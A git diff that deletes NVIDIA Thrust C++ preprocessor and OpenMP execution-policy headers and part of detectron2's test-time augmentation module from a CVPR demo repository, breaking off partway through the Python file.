THRUST_PP_BOOL_IMPL_TAG27 1 -#define THRUST_PP_BOOL_IMPL_TAG28 1 -#define THRUST_PP_BOOL_IMPL_TAG29 1 -#define THRUST_PP_BOOL_IMPL_TAG30 1 -#define THRUST_PP_BOOL_IMPL_TAG31 1 -#define THRUST_PP_BOOL_IMPL_TAG32 1 -#define THRUST_PP_BOOL_IMPL_TAG33 1 -#define THRUST_PP_BOOL_IMPL_TAG34 1 -#define THRUST_PP_BOOL_IMPL_TAG35 1 -#define THRUST_PP_BOOL_IMPL_TAG36 1 -#define THRUST_PP_BOOL_IMPL_TAG37 1 -#define THRUST_PP_BOOL_IMPL_TAG38 1 -#define THRUST_PP_BOOL_IMPL_TAG39 1 -#define THRUST_PP_BOOL_IMPL_TAG40 1 -#define THRUST_PP_BOOL_IMPL_TAG41 1 -#define THRUST_PP_BOOL_IMPL_TAG42 1 -#define THRUST_PP_BOOL_IMPL_TAG43 1 -#define THRUST_PP_BOOL_IMPL_TAG44 1 -#define THRUST_PP_BOOL_IMPL_TAG45 1 -#define THRUST_PP_BOOL_IMPL_TAG46 1 -#define THRUST_PP_BOOL_IMPL_TAG47 1 -#define THRUST_PP_BOOL_IMPL_TAG48 1 -#define THRUST_PP_BOOL_IMPL_TAG49 1 -#define THRUST_PP_BOOL_IMPL_TAG50 1 -#define THRUST_PP_BOOL_IMPL_TAG51 1 -#define THRUST_PP_BOOL_IMPL_TAG52 1 -#define THRUST_PP_BOOL_IMPL_TAG53 1 -#define THRUST_PP_BOOL_IMPL_TAG54 1 -#define THRUST_PP_BOOL_IMPL_TAG55 1 -#define THRUST_PP_BOOL_IMPL_TAG56 1 -#define THRUST_PP_BOOL_IMPL_TAG57 1 -#define THRUST_PP_BOOL_IMPL_TAG58 1 -#define THRUST_PP_BOOL_IMPL_TAG59 1 -#define THRUST_PP_BOOL_IMPL_TAG60 1 -#define THRUST_PP_BOOL_IMPL_TAG61 1 -#define THRUST_PP_BOOL_IMPL_TAG62 1 -#define THRUST_PP_BOOL_IMPL_TAG63 1 -#define THRUST_PP_BOOL_IMPL_TAG64 1 -#define THRUST_PP_BOOL_IMPL_TAG65 1 -#define THRUST_PP_BOOL_IMPL_TAG66 1 -#define THRUST_PP_BOOL_IMPL_TAG67 1 -#define THRUST_PP_BOOL_IMPL_TAG68 1 -#define THRUST_PP_BOOL_IMPL_TAG69 1 -#define THRUST_PP_BOOL_IMPL_TAG70 1 -#define THRUST_PP_BOOL_IMPL_TAG71 1 -#define THRUST_PP_BOOL_IMPL_TAG72 1 -#define THRUST_PP_BOOL_IMPL_TAG73 1 -#define THRUST_PP_BOOL_IMPL_TAG74 1 -#define THRUST_PP_BOOL_IMPL_TAG75 1 -#define THRUST_PP_BOOL_IMPL_TAG76 1 -#define THRUST_PP_BOOL_IMPL_TAG77 1 -#define THRUST_PP_BOOL_IMPL_TAG78 1 -#define THRUST_PP_BOOL_IMPL_TAG79 1 -#define THRUST_PP_BOOL_IMPL_TAG80 1 -#define THRUST_PP_BOOL_IMPL_TAG81 1 -#define THRUST_PP_BOOL_IMPL_TAG82 1 -#define THRUST_PP_BOOL_IMPL_TAG83 1 -#define THRUST_PP_BOOL_IMPL_TAG84 1 -#define THRUST_PP_BOOL_IMPL_TAG85 1 -#define THRUST_PP_BOOL_IMPL_TAG86 1 -#define THRUST_PP_BOOL_IMPL_TAG87 1 -#define THRUST_PP_BOOL_IMPL_TAG88 1 -#define THRUST_PP_BOOL_IMPL_TAG89 1 -#define THRUST_PP_BOOL_IMPL_TAG90 1 -#define THRUST_PP_BOOL_IMPL_TAG91 1 -#define THRUST_PP_BOOL_IMPL_TAG92 1 -#define THRUST_PP_BOOL_IMPL_TAG93 1 -#define THRUST_PP_BOOL_IMPL_TAG94 1 -#define THRUST_PP_BOOL_IMPL_TAG95 1 -#define THRUST_PP_BOOL_IMPL_TAG96 1 -#define THRUST_PP_BOOL_IMPL_TAG97 1 -#define THRUST_PP_BOOL_IMPL_TAG98 1 -#define THRUST_PP_BOOL_IMPL_TAG99 1 -#define THRUST_PP_BOOL_IMPL_TAG100 1 -#define THRUST_PP_BOOL_IMPL_TAG101 1 -#define THRUST_PP_BOOL_IMPL_TAG102 1 -#define THRUST_PP_BOOL_IMPL_TAG103 1 -#define THRUST_PP_BOOL_IMPL_TAG104 1 -#define THRUST_PP_BOOL_IMPL_TAG105 1 -#define THRUST_PP_BOOL_IMPL_TAG106 1 -#define THRUST_PP_BOOL_IMPL_TAG107 1 -#define THRUST_PP_BOOL_IMPL_TAG108 1 -#define THRUST_PP_BOOL_IMPL_TAG109 1 -#define THRUST_PP_BOOL_IMPL_TAG110 1 -#define THRUST_PP_BOOL_IMPL_TAG111 1 -#define THRUST_PP_BOOL_IMPL_TAG112 1 -#define THRUST_PP_BOOL_IMPL_TAG113 1 -#define THRUST_PP_BOOL_IMPL_TAG114 1 -#define THRUST_PP_BOOL_IMPL_TAG115 1 -#define THRUST_PP_BOOL_IMPL_TAG116 1 -#define THRUST_PP_BOOL_IMPL_TAG117 1 -#define THRUST_PP_BOOL_IMPL_TAG118 1 -#define THRUST_PP_BOOL_IMPL_TAG119 1 -#define THRUST_PP_BOOL_IMPL_TAG120 1 -#define THRUST_PP_BOOL_IMPL_TAG121 1 -#define 
THRUST_PP_BOOL_IMPL_TAG122 1 -#define THRUST_PP_BOOL_IMPL_TAG123 1 -#define THRUST_PP_BOOL_IMPL_TAG124 1 -#define THRUST_PP_BOOL_IMPL_TAG125 1 -#define THRUST_PP_BOOL_IMPL_TAG126 1 -#define THRUST_PP_BOOL_IMPL_TAG127 1 -#define THRUST_PP_BOOL_IMPL_TAG128 1 -#define THRUST_PP_BOOL_IMPL_TAG129 1 -#define THRUST_PP_BOOL_IMPL_TAG130 1 -#define THRUST_PP_BOOL_IMPL_TAG131 1 -#define THRUST_PP_BOOL_IMPL_TAG132 1 -#define THRUST_PP_BOOL_IMPL_TAG133 1 -#define THRUST_PP_BOOL_IMPL_TAG134 1 -#define THRUST_PP_BOOL_IMPL_TAG135 1 -#define THRUST_PP_BOOL_IMPL_TAG136 1 -#define THRUST_PP_BOOL_IMPL_TAG137 1 -#define THRUST_PP_BOOL_IMPL_TAG138 1 -#define THRUST_PP_BOOL_IMPL_TAG139 1 -#define THRUST_PP_BOOL_IMPL_TAG140 1 -#define THRUST_PP_BOOL_IMPL_TAG141 1 -#define THRUST_PP_BOOL_IMPL_TAG142 1 -#define THRUST_PP_BOOL_IMPL_TAG143 1 -#define THRUST_PP_BOOL_IMPL_TAG144 1 -#define THRUST_PP_BOOL_IMPL_TAG145 1 -#define THRUST_PP_BOOL_IMPL_TAG146 1 -#define THRUST_PP_BOOL_IMPL_TAG147 1 -#define THRUST_PP_BOOL_IMPL_TAG148 1 -#define THRUST_PP_BOOL_IMPL_TAG149 1 -#define THRUST_PP_BOOL_IMPL_TAG150 1 -#define THRUST_PP_BOOL_IMPL_TAG151 1 -#define THRUST_PP_BOOL_IMPL_TAG152 1 -#define THRUST_PP_BOOL_IMPL_TAG153 1 -#define THRUST_PP_BOOL_IMPL_TAG154 1 -#define THRUST_PP_BOOL_IMPL_TAG155 1 -#define THRUST_PP_BOOL_IMPL_TAG156 1 -#define THRUST_PP_BOOL_IMPL_TAG157 1 -#define THRUST_PP_BOOL_IMPL_TAG158 1 -#define THRUST_PP_BOOL_IMPL_TAG159 1 -#define THRUST_PP_BOOL_IMPL_TAG160 1 -#define THRUST_PP_BOOL_IMPL_TAG161 1 -#define THRUST_PP_BOOL_IMPL_TAG162 1 -#define THRUST_PP_BOOL_IMPL_TAG163 1 -#define THRUST_PP_BOOL_IMPL_TAG164 1 -#define THRUST_PP_BOOL_IMPL_TAG165 1 -#define THRUST_PP_BOOL_IMPL_TAG166 1 -#define THRUST_PP_BOOL_IMPL_TAG167 1 -#define THRUST_PP_BOOL_IMPL_TAG168 1 -#define THRUST_PP_BOOL_IMPL_TAG169 1 -#define THRUST_PP_BOOL_IMPL_TAG170 1 -#define THRUST_PP_BOOL_IMPL_TAG171 1 -#define THRUST_PP_BOOL_IMPL_TAG172 1 -#define THRUST_PP_BOOL_IMPL_TAG173 1 -#define THRUST_PP_BOOL_IMPL_TAG174 1 -#define THRUST_PP_BOOL_IMPL_TAG175 1 -#define THRUST_PP_BOOL_IMPL_TAG176 1 -#define THRUST_PP_BOOL_IMPL_TAG177 1 -#define THRUST_PP_BOOL_IMPL_TAG178 1 -#define THRUST_PP_BOOL_IMPL_TAG179 1 -#define THRUST_PP_BOOL_IMPL_TAG180 1 -#define THRUST_PP_BOOL_IMPL_TAG181 1 -#define THRUST_PP_BOOL_IMPL_TAG182 1 -#define THRUST_PP_BOOL_IMPL_TAG183 1 -#define THRUST_PP_BOOL_IMPL_TAG184 1 -#define THRUST_PP_BOOL_IMPL_TAG185 1 -#define THRUST_PP_BOOL_IMPL_TAG186 1 -#define THRUST_PP_BOOL_IMPL_TAG187 1 -#define THRUST_PP_BOOL_IMPL_TAG188 1 -#define THRUST_PP_BOOL_IMPL_TAG189 1 -#define THRUST_PP_BOOL_IMPL_TAG190 1 -#define THRUST_PP_BOOL_IMPL_TAG191 1 -#define THRUST_PP_BOOL_IMPL_TAG192 1 -#define THRUST_PP_BOOL_IMPL_TAG193 1 -#define THRUST_PP_BOOL_IMPL_TAG194 1 -#define THRUST_PP_BOOL_IMPL_TAG195 1 -#define THRUST_PP_BOOL_IMPL_TAG196 1 -#define THRUST_PP_BOOL_IMPL_TAG197 1 -#define THRUST_PP_BOOL_IMPL_TAG198 1 -#define THRUST_PP_BOOL_IMPL_TAG199 1 -#define THRUST_PP_BOOL_IMPL_TAG200 1 -#define THRUST_PP_BOOL_IMPL_TAG201 1 -#define THRUST_PP_BOOL_IMPL_TAG202 1 -#define THRUST_PP_BOOL_IMPL_TAG203 1 -#define THRUST_PP_BOOL_IMPL_TAG204 1 -#define THRUST_PP_BOOL_IMPL_TAG205 1 -#define THRUST_PP_BOOL_IMPL_TAG206 1 -#define THRUST_PP_BOOL_IMPL_TAG207 1 -#define THRUST_PP_BOOL_IMPL_TAG208 1 -#define THRUST_PP_BOOL_IMPL_TAG209 1 -#define THRUST_PP_BOOL_IMPL_TAG210 1 -#define THRUST_PP_BOOL_IMPL_TAG211 1 -#define THRUST_PP_BOOL_IMPL_TAG212 1 -#define THRUST_PP_BOOL_IMPL_TAG213 1 -#define THRUST_PP_BOOL_IMPL_TAG214 1 -#define 
THRUST_PP_BOOL_IMPL_TAG215 1 -#define THRUST_PP_BOOL_IMPL_TAG216 1 -#define THRUST_PP_BOOL_IMPL_TAG217 1 -#define THRUST_PP_BOOL_IMPL_TAG218 1 -#define THRUST_PP_BOOL_IMPL_TAG219 1 -#define THRUST_PP_BOOL_IMPL_TAG220 1 -#define THRUST_PP_BOOL_IMPL_TAG221 1 -#define THRUST_PP_BOOL_IMPL_TAG222 1 -#define THRUST_PP_BOOL_IMPL_TAG223 1 -#define THRUST_PP_BOOL_IMPL_TAG224 1 -#define THRUST_PP_BOOL_IMPL_TAG225 1 -#define THRUST_PP_BOOL_IMPL_TAG226 1 -#define THRUST_PP_BOOL_IMPL_TAG227 1 -#define THRUST_PP_BOOL_IMPL_TAG228 1 -#define THRUST_PP_BOOL_IMPL_TAG229 1 -#define THRUST_PP_BOOL_IMPL_TAG230 1 -#define THRUST_PP_BOOL_IMPL_TAG231 1 -#define THRUST_PP_BOOL_IMPL_TAG232 1 -#define THRUST_PP_BOOL_IMPL_TAG233 1 -#define THRUST_PP_BOOL_IMPL_TAG234 1 -#define THRUST_PP_BOOL_IMPL_TAG235 1 -#define THRUST_PP_BOOL_IMPL_TAG236 1 -#define THRUST_PP_BOOL_IMPL_TAG237 1 -#define THRUST_PP_BOOL_IMPL_TAG238 1 -#define THRUST_PP_BOOL_IMPL_TAG239 1 -#define THRUST_PP_BOOL_IMPL_TAG240 1 -#define THRUST_PP_BOOL_IMPL_TAG241 1 -#define THRUST_PP_BOOL_IMPL_TAG242 1 -#define THRUST_PP_BOOL_IMPL_TAG243 1 -#define THRUST_PP_BOOL_IMPL_TAG244 1 -#define THRUST_PP_BOOL_IMPL_TAG245 1 -#define THRUST_PP_BOOL_IMPL_TAG246 1 -#define THRUST_PP_BOOL_IMPL_TAG247 1 -#define THRUST_PP_BOOL_IMPL_TAG248 1 -#define THRUST_PP_BOOL_IMPL_TAG249 1 -#define THRUST_PP_BOOL_IMPL_TAG250 1 -#define THRUST_PP_BOOL_IMPL_TAG251 1 -#define THRUST_PP_BOOL_IMPL_TAG252 1 -#define THRUST_PP_BOOL_IMPL_TAG253 1 -#define THRUST_PP_BOOL_IMPL_TAG254 1 -#define THRUST_PP_BOOL_IMPL_TAG255 1 -#define THRUST_PP_BOOL_IMPL_TAG256 1 - -/////////////////////////////////////////////////////////////////////////////// - -#define THRUST_PP_IIF(bit, t, f) THRUST_PP_IIF_IMPL0(bit, t, f) - -#if defined(_MSC_VER) - #define THRUST_PP_IIF_IMPL0(bit, t, f) \ - THRUST_PP_IIF_IMPL1(THRUST_PP_CAT2(THRUST_PP_IIF_IMPL_TAG, bit(t, f))) \ - /**/ - #define THRUST_PP_IIF_IMPL1(id) id -#else - #define THRUST_PP_IIF_IMPL0(bit, t, f) \ - THRUST_PP_CAT2(THRUST_PP_IIF_IMPL_TAG, bit(t, f)) - /**/ -#endif - -#define THRUST_PP_IIF_IMPL_TAG0(t, f) f -#define THRUST_PP_IIF_IMPL_TAG1(t, f) t - -#if defined(__EDG__) - #define THRUST_PP_IF(cond, t, f) THRUST_PP_IF_IMPL0(cond, t, f) - #define THRUST_PP_IF_IMPL0(cond, t, f) \ - THRUST_PP_IIF(THRUST_PP_BOOL(cond), t, f) \ - /**/ -#else - #define THRUST_PP_IF(cond, t, f) THRUST_PP_IIF(THRUST_PP_BOOL(cond), t, f) -#endif - -/// \def THRUST_COMMA_IF(cond) -/// \brief If \a cond is true, expands to a comma. Otherwise, expands to nothing. 
-/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << THRUST_PP_STRINGIZE(THRUST_COMMA_IF(0)) << "\n" -/// << THRUST_PP_STRINGIZE(THRUST_COMMA_IF(1)) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << "" << "\n" -/// << "," << "\n"; -/// } -/// \endcode -/// -#if defined(__EDG__) - #define THRUST_PP_COMMA_IF(cond) THRUST_PP_COMMA_IF_IMPL0(cond) - #define THRUST_PP_COMMA_IF_IMPL0(cond) \ - THRUST_PP_IF(cond, THRUST_PP_COMMA, THRUST_PP_EMPTY)() \ - /**/ -#else - #define THRUST_PP_COMMA_IF(cond) \ - THRUST_PP_IF(cond, THRUST_PP_COMMA, THRUST_PP_EMPTY)() \ - /**/ -#endif - -/////////////////////////////////////////////////////////////////////////////// - -// http://gustedt.wordpress.com/2010/06/08/detect-empty-macro-arguments - -#define THRUST_PP_64TH_ARG( \ - _1, _2, _3, _4, _5, _6, _7, _8, _9,_10,_11,_12,_13,_14,_15,_16 \ - , _17,_18,_19,_20,_21,_22,_23,_24,_25,_26,_27,_28,_29,_30,_31,_32 \ - , _33,_34,_35,_36,_37,_38,_39,_40,_41,_42,_43,_44,_45,_46,_47,_48 \ - , _49,_50,_51,_52,_53,_54,_55,_56,_57,_58,_59,_60,_61,_62,_63, N \ - , ... \ - ) N \ - /**/ - -#define THRUST_PP_HAS_COMMA(...) \ - THRUST_PP_EXPAND(THRUST_PP_64TH_ARG( \ - __VA_ARGS__ \ - , 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 \ - , 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 \ - , 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 \ - , 1,1,1,1,1,1,1,1,1,1,1,1,1,1,0 \ - )) \ - /**/ - -#define THRUST_PP_TRIGGER_PAREN(...) , - -#define THRUST_PP_IS_VARIADIC_NULLARY(...) \ - THRUST_PP_IS_VARIADIC_NULLARY_IMPL0( \ - /* Test if there is just one argument, eventually an empty one. */ \ - THRUST_PP_HAS_COMMA(__VA_ARGS__), \ - /* Test if THRUST_PP_TRIGGER_PAREN together with the argument adds a */ \ - /* comma. */ \ - THRUST_PP_HAS_COMMA(THRUST_PP_TRIGGER_PAREN __VA_ARGS__), \ - /* Test if the argument together with a parenthesis adds a comma. */ \ - THRUST_PP_HAS_COMMA(__VA_ARGS__ (/*empty*/)), \ - /* Test if placing it between THRUST_PP_TRIGGER_PAREN and the */ \ - /* parenthesis adds a comma. */ \ - THRUST_PP_HAS_COMMA(THRUST_PP_TRIGGER_PAREN __VA_ARGS__ (/*empty*/)) \ - ) \ - /**/ - -#define THRUST_PP_IS_VARIADIC_NULLARY_IMPL0(_0, _1, _2, _3) \ - THRUST_PP_HAS_COMMA( \ - THRUST_PP_CAT5(THRUST_PP_IS_VARIADIC_NULLARY_IMPL_TAG, _0, _1, _2, _3) \ - ) \ - -#define THRUST_PP_IS_VARIADIC_NULLARY_IMPL_TAG0001 , - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_PP_ARITY(...) -/// \brief Returns the number of arguments that it was called with. Must be -/// called with less than 64 arguments. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << THRUST_PP_ARITY() << "\n" -/// << THRUST_PP_ARITY(x) << "\n" -/// << THRUST_PP_ARITY(x, y) << "\n" -/// << THRUST_PP_ARITY(x, y, z) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << 0 << "\n" -/// << 1 << "\n" -/// << 2 << "\n" -/// << 3 << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_ARITY(...) 
\ - THRUST_PP_EXPAND( \ - THRUST_PP_IF( \ - THRUST_PP_IS_VARIADIC_NULLARY(__VA_ARGS__) \ - , 0 \ - , THRUST_PP_64TH_ARG( \ - __VA_ARGS__ \ - , 63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48 \ - , 47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32 \ - , 31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16 \ - , 15,14,13,12,11,10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0 \ - ) \ - ) \ - ) \ - /**/ - -/// \def THRUST_PP_DISPATCH(basename, ...) -/// \brief Expands to basenameN(...), where N is the -/// number of variadic arguments that \a THRUST_PP_DISPATCH was called -/// with. This macro can be used to implement "macro overloading". -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// #define PLUS(...) THRUST_PP_DISPATCH(PLUS, __VA_ARGS__) -/// #define PLUS0() 0 -/// #define PLUS1(x) x -/// #define PLUS2(x, y) x + y -/// #define PLUS3(x, y, z) x + y + z -/// -/// int main() -/// { -/// std::cout << PLUS() << "\n" -/// << PLUS(1) << "\n" -/// << PLUS(1, 2) << "\n" -/// << PLUS(1, 2, 3) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << 0 << "\n" -/// << 1 << "\n" -/// << 1 + 2 << "\n" -/// << 1 + 2 + 3 << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_DISPATCH(basename, ...) \ - THRUST_PP_EXPAND( \ - THRUST_PP_CAT2( \ - basename, \ - THRUST_PP_ARITY(__VA_ARGS__) \ - )(__VA_ARGS__) \ - ) \ - /**/ - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_CURRENT_FUNCTION -/// \brief The name of the current function as a string. -/// -#if defined(__GNUC__) \ - || (defined(__MWERKS__) && (__MWERKS__ >= 0x3000)) \ - || (defined(__ICC) && (__ICC >= 600)) || defined(__ghs__) - #define THRUST_CURRENT_FUNCTION __PRETTY_FUNCTION__ -#elif defined(__DMC__) && (__DMC__ >= 0x810) - #define THRUST_CURRENT_FUNCTION __PRETTY_FUNCTION__ -#elif defined(__FUNCSIG__) - #define THRUST_CURRENT_FUNCTION __FUNCSIG__ -#elif (defined(__INTEL_COMPILER) && (__INTEL_COMPILER >= 600)) \ - || (defined(__IBMCTHRUST_PP__) && (__IBMCTHRUST_PP__ >= 500)) - #define THRUST_CURRENT_FUNCTION __FUNCTION__ -#elif defined(__BORLANDC__) && (__BORLANDC__ >= 0x550) - #define THRUST_CURRENT_FUNCTION __FUNC__ -#elif defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901) - #define THRUST_CURRENT_FUNCTION __func__ -#elif defined(__cplusplus) && (__cplusplus >= 201103) - #define THRUST_CURRENT_FUNCTION __func__ -#else - #define THRUST_CURRENT_FUNCTION "(unknown)" -#endif - -/////////////////////////////////////////////////////////////////////////////// - diff --git a/spaces/CVPR/LIVE/thrust/thrust/detail/use_default.h b/spaces/CVPR/LIVE/thrust/thrust/detail/use_default.h deleted file mode 100644 index ba2c27bc58bb4abe62945587eb94238f7988b341..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/detail/use_default.h +++ /dev/null @@ -1,27 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. 
- */ - -#pragma once - -#include - -namespace thrust -{ - -struct use_default {}; - -} // end thrust - diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/execution_policy.h b/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/execution_policy.h deleted file mode 100644 index 52c879a168551227c059416d4b80fde69491bfa4..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/execution_policy.h +++ /dev/null @@ -1,107 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include -#include -#include -#include -#include - -namespace thrust -{ -namespace system -{ -// put the canonical tag in the same ns as the backend's entry points -namespace omp -{ -namespace detail -{ - -// this awkward sequence of definitions arise -// from the desire both for tag to derive -// from execution_policy and for execution_policy -// to convert to tag (when execution_policy is not -// an ancestor of tag) - -// forward declaration of tag -struct tag; - -// forward declaration of execution_policy -template struct execution_policy; - -// specialize execution_policy for tag -template<> - struct execution_policy - : thrust::system::cpp::detail::execution_policy -{}; - -// tag's definition comes before the -// generic definition of execution_policy -struct tag : execution_policy {}; - -// allow conversion to tag when it is not a successor -template - struct execution_policy - : thrust::system::cpp::detail::execution_policy -{ - typedef tag tag_type; - operator tag() const { return tag(); } -}; - - -// overloads of select_system - -// XXX select_system(tbb, omp) & select_system(omp, tbb) are ambiguous -// because both convert to cpp without these overloads, which we -// arbitrarily define in the omp backend - -template -inline __host__ __device__ - System1 select_system(execution_policy s, thrust::system::tbb::detail::execution_policy) -{ - return thrust::detail::derived_cast(s); -} // end select_system() - - -template -inline __host__ __device__ - System2 select_system(thrust::system::tbb::detail::execution_policy, execution_policy s) -{ - return thrust::detail::derived_cast(s); -} // end select_system() - - -} // end detail - -// alias execution_policy and tag here -using thrust::system::omp::detail::execution_policy; -using thrust::system::omp::detail::tag; - -} // end omp -} // end system - -// alias items at top-level -namespace omp -{ - -using thrust::system::omp::execution_policy; -using thrust::system::omp::tag; - -} // end omp -} // end thrust - diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/transform_scan.h b/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/transform_scan.h deleted file mode 100644 index 75b075b6b16f063a1c5cda8893911d3f3c533f2d..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/system/omp/detail/transform_scan.h +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache 
License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system inherits transform_scan -#include - diff --git a/spaces/CVPR/regionclip-demo/detectron2/modeling/test_time_augmentation.py b/spaces/CVPR/regionclip-demo/detectron2/modeling/test_time_augmentation.py deleted file mode 100644 index 373e6bf00a39c040ff1da49d6dcd39a54a0b69a7..0000000000000000000000000000000000000000 --- a/spaces/CVPR/regionclip-demo/detectron2/modeling/test_time_augmentation.py +++ /dev/null @@ -1,307 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import copy -import numpy as np -from contextlib import contextmanager -from itertools import count -from typing import List -import torch -from fvcore.transforms import HFlipTransform, NoOpTransform -from torch import nn -from torch.nn.parallel import DistributedDataParallel - -from detectron2.config import configurable -from detectron2.data.detection_utils import read_image -from detectron2.data.transforms import ( - RandomFlip, - ResizeShortestEdge, - ResizeTransform, - apply_augmentations, -) -from detectron2.structures import Boxes, Instances - -from .meta_arch import GeneralizedRCNN -from .postprocessing import detector_postprocess -from .roi_heads.fast_rcnn import fast_rcnn_inference_single_image - -__all__ = ["DatasetMapperTTA", "GeneralizedRCNNWithTTA"] - - -class DatasetMapperTTA: - """ - Implement test-time augmentation for detection data. - It is a callable which takes a dataset dict from a detection dataset, - and returns a list of dataset dicts where the images - are augmented from the input image by the transformations defined in the config. - This is used for test-time augmentation. - """ - - @configurable - def __init__(self, min_sizes: List[int], max_size: int, flip: bool): - """ - Args: - min_sizes: list of short-edge size to resize the image to - max_size: maximum height or width of resized images - flip: whether to apply flipping augmentation - """ - self.min_sizes = min_sizes - self.max_size = max_size - self.flip = flip - - @classmethod - def from_config(cls, cfg): - return { - "min_sizes": cfg.TEST.AUG.MIN_SIZES, - "max_size": cfg.TEST.AUG.MAX_SIZE, - "flip": cfg.TEST.AUG.FLIP, - } - - def __call__(self, dataset_dict): - """ - Args: - dict: a dict in standard model input format. See tutorials for details. - - Returns: - list[dict]: - a list of dicts, which contain augmented version of the input image. - The total number of dicts is ``len(min_sizes) * (2 if flip else 1)``. - Each dict has field "transforms" which is a TransformList, - containing the transforms that are used to generate this image. 
- """ - numpy_image = dataset_dict["image"].permute(1, 2, 0).numpy() - shape = numpy_image.shape - orig_shape = (dataset_dict["height"], dataset_dict["width"]) - if shape[:2] != orig_shape: - # It transforms the "original" image in the dataset to the input image - pre_tfm = ResizeTransform(orig_shape[0], orig_shape[1], shape[0], shape[1]) - else: - pre_tfm = NoOpTransform() - - # Create all combinations of augmentations to use - aug_candidates = [] # each element is a list[Augmentation] - for min_size in self.min_sizes: - resize = ResizeShortestEdge(min_size, self.max_size) - aug_candidates.append([resize]) # resize only - if self.flip: - flip = RandomFlip(prob=1.0) - aug_candidates.append([resize, flip]) # resize + flip - - # Apply all the augmentations - ret = [] - for aug in aug_candidates: - new_image, tfms = apply_augmentations(aug, np.copy(numpy_image)) - torch_image = torch.from_numpy(np.ascontiguousarray(new_image.transpose(2, 0, 1))) - - dic = copy.deepcopy(dataset_dict) - dic["transforms"] = pre_tfm + tfms - dic["image"] = torch_image - ret.append(dic) - return ret - - -class GeneralizedRCNNWithTTA(nn.Module): - """ - A GeneralizedRCNN with test-time augmentation enabled. - Its :meth:`__call__` method has the same interface as :meth:`GeneralizedRCNN.forward`. - """ - - def __init__(self, cfg, model, tta_mapper=None, batch_size=3): - """ - Args: - cfg (CfgNode): - model (GeneralizedRCNN): a GeneralizedRCNN to apply TTA on. - tta_mapper (callable): takes a dataset dict and returns a list of - augmented versions of the dataset dict. Defaults to - `DatasetMapperTTA(cfg)`. - batch_size (int): batch the augmented images into this batch size for inference. - """ - super().__init__() - if isinstance(model, DistributedDataParallel): - model = model.module - assert isinstance( - model, GeneralizedRCNN - ), "TTA is only supported on GeneralizedRCNN. Got a model of type {}".format(type(model)) - self.cfg = cfg.clone() - assert not self.cfg.MODEL.KEYPOINT_ON, "TTA for keypoint is not supported yet" - assert ( - not self.cfg.MODEL.LOAD_PROPOSALS - ), "TTA for pre-computed proposals is not supported yet" - - self.model = model - - if tta_mapper is None: - tta_mapper = DatasetMapperTTA(cfg) - self.tta_mapper = tta_mapper - self.batch_size = batch_size - - @contextmanager - def _turn_off_roi_heads(self, attrs): - """ - Open a context where some heads in `model.roi_heads` are temporarily turned off. - Args: - attr (list[str]): the attribute in `model.roi_heads` which can be used - to turn off a specific head, e.g., "mask_on", "keypoint_on". - """ - roi_heads = self.model.roi_heads - old = {} - for attr in attrs: - try: - old[attr] = getattr(roi_heads, attr) - except AttributeError: - # The head may not be implemented in certain ROIHeads - pass - - if len(old.keys()) == 0: - yield - else: - for attr in old.keys(): - setattr(roi_heads, attr, False) - yield - for attr in old.keys(): - setattr(roi_heads, attr, old[attr]) - - def _batch_inference(self, batched_inputs, detected_instances=None): - """ - Execute inference on a list of inputs, - using batch size = self.batch_size, instead of the length of the list. 
